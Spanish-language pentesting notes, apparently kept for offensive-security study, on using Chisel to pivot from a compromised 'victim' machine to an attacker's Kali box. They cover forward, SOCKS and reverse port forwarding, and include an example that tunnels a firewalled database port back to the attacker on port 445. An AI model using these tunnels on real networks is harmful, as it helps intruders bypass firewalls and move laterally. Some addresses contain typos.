Chisel for pivoting
Chisel en maquina victima:
./chisel server --socks5 --port 51234
Chisel en maquina atacante kali
./chisel client victim-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443
- Con esto vemos esos puertos en nuestro local
- Si no también así:
./chisel client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.01:8443
Chisel con socks
Maquina victima
./chisel server --socks5 --port 51234
Maquina atacante kali
./chisel client target-box-ip:51234 50080:socks
Reverse port forwarding
- Ejecutar chisel server en maquina atacante en modo reverso
Chisel en maquina atacante kali
./chisel server --reverse --port 51234
Chisel en maquina victima
./chisel client attack-box-ip:51234 R:50080:socks
Se puede combinar con ligolo + revert port por si no hay acceso SSH
Ejemplo de uso de chisel para escuchar un puerto que el firewall no permite
- Caso hipotetico de que comprometimos un servidor que posee una base de datos pero no podemos acceder a ella porque el firewall no permite conexiones desde la red de la base de datos a la red de la victima.
- Hacemos un reverse port forwarding con chisel y escuchamos el puerto de la base de datos en la maquina atacante.
Maquina atacante:
./chisel server --port 445 --reverse
Maquina victima:
.\chisel.exe client 192.168.45.210:445 R:1433:127.0.0.1:1433
chisel client KALI_IP:PORT R:PORT:LOCALHOST:PORT
- Si justo estamos usando el puerto 1433 en nuestro kali para otra cosa podemos usar otro puerto
- ``.\chisel.exe client 192.168.45.210:445 R:15432:127.0.0.1:1433`